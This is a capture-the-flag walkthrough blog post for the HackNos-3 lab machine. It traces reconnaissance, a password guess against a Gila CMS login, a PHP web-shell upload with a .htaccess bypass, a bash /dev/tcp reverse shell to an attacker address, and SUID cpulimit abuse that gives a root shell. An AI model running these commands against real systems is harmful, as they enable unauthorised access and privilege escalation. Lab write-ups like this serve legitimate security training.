CTF-Walkthrough for HackNos-3

Share this post:

Daniel Lowrie here. I decided to try out this capture the flag for fun and I’m taking you along with me. If you want to follow along with me you can find the CTF here. Let’s begin!

It all started by getting the IP of the target, which I did through a simple ping sweep of the network it was on, but you could easily perform a “netdiscover” or “nmap” scan to look for it. Once I had that I was ready to start the initial Recon and Scanning of the target.

I like to start off with an aggressively timed scan of all ports, just to see what’s open…

It looks like we got a webserver on our hands, but let’s throw another nmap scan at it to enumerate a little more…

Not a ton more information about our target from that, but it looks like we’re on the right track.

Since this is a web server I usually run a Nikto scan, so that’s what we’ll do…

Again, not a ton of new info here. We do see a “/scripts” directory with directory indexing enabled, so we’ll just record that in our notes for later. How about we run a directory buster and see if anything new shows up.

Sweet! A couple more directories to check out. The “/scripts” directory didn’t give me a lot to work with, but then again it did allow me to enumerate some technology versions that may or may not be helpful…

Let’s see what’s in the other two directories.

Cool! A web-based ticketing system. I walk around it for a while, run Nikto, run GoBuster, and manually crawling the site. I did find a login page for the agents…

I messed around with this portal for a while, but I got nowhere. Not sure if it was meant to be a troll, or if there is a way to hack it, but I had other areas as yet unexplored, so I moved on to the “/websec” directory.

I run a “cewl” scan to grab any words for a possible password dictionary as well as looking for email addresses.

We now have an email address. Cewl! (see what I did there ;D )

Let’s see what Nikto can discern.

As you can see there were a couple of items that caught my eye. Maybe that config file has username(s) and/or password(s). Maybe I can then use them to log in to the web portal. Maybe.

I found out something interesting about this site. You have to log in to visit any of the pages and it’s powered by something called “Gila CMS”.  The portal only takes email format as input for “E-mail” input box. The good news is we have an email address from the cewl scan earlier. We’ll just throw that in there and then proxy the request through Burp Suite where I can then brute-force the password using Burp’s Intruder module. Access is now but a brute-force attack away! MU-HA-HA-HA-HA-HA!!!

RATS!!! Foiled again! It looks like a WAF or something is blocking rapid POST requests by banning the offending IP for “a minute”. Errrrrr! I tried adjusting the scan timing, but that’s only available with a licensed copy of Burp. OWASP ZAP can throttle the scan, but not enough to keep the WAF or whatever from banning my IP. It looks like manually logging in is in order. The good thing is there is only around 60 entries.

After a few tries, I get in with

contact@hacknos.com:Securityx

I then check out the left-side menu.

I am then given the option to create and/or upload a file. I can also edit the files. I try to upload my custom web-shell (https://github.com/daniellowrie/WebShell-v1/blob/master/x.php ), but even though I get a “success” message after uploading, the file doesn’t show up in the directory tree.

So I create a file called x.php and copy/paste the PHP code into the file and save, then browse to http://192.168.0.15/websec/x.php

Another roadblock. OK. Let’s look at that “.htaccess” file. It looks like I need to add a line to make the x.php file accessible.

Add and save…

RewriteCond %{REQUEST_URI} !x.php

And now…

Excellent! Now I can throw commands with ease at this app and get a reverse shell. So a little bash magic and we should get a connection at the Netcat listener.

/bin/bash -c ‘/bin/bash>/dev/tcp/192.168.0.16/9999 0>&1 2>&1 &’

Now a little python magic for a better shell experience.

$python -c ‘import pty;pty.spawn(“/bin/bash”)’

Next, I use wget to upload my custom Privilege Escalation script (privy.sh https://github.com/daniellowrie/Privy) and see if any low-hanging fruit is ripe for the picking.

In the SUID-GUID.txt file I see something interesting…

I quickly hop over to https://gtfobins.github.io and search for “cpulimit”. (Actually, I searched a few possible binaries first and hit on “cpulimit”)

At this point, I think I’m just 1 command away from rooting this machine, but alas that was not to be the case. It opened the sh shell, but I was still www-data. I was surprised since this was running with SUID as root.

I then spent A LOT of time trying different things. Instead of running /bin/sh I tried all sorts of commands (cp, mv, id, mkdir, cat /etc/shadow) and these did run as root! Yes, you heard me correctly; I could indeed read /etc/shadow! (Just in case you’re wondering I did run the password hashes through johntheripper with rockyou.txt without success).

Because I could run things as root, I was convinced this would lead me to full Priv Esc, but how. Ok think, think, think! I then had an epiphany. If I could set permissions like SUID and Execute, I could change the permissions on another system binary that was a little more friendly to priv esc. I look at a few binaries in gtfobins and looking at “bash” I get hopeful.

From messing around with the “cpulimit” command I had a feeling that this wasn’t going to run “as-is” because the -f option didn’t like other flags and switches or a lot of special characters, so I broke it down and ran each element individually.

Oh, and I also created a directory off of / called “/mydir” to mess with all this.

$ cpulimit -l 100 -f mkdir /mydir
$ cpulimit -l 100 -f chmod 4755 /usr/bin/bash
$ cpulimit -l 100 -f cp /usr/bin/bash /mydir
$ cpulimit -l 100 -f chmod +s /mydir/bash
$ cd /mydir
$ ./bash -p
# id
Uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

Now I go after the root flag…

I also got the user flag…

All in all, this was a really fun challenge and was just difficult enough to be challenging without making you suffer utter despair. I hope this helps all that are trying to get through this CTF. Thanks to Rahul Gehlaut for creating this CTF!

If you’re interested in security training, check out my courses on CEHv10, PenTest+, and more on ITProTV.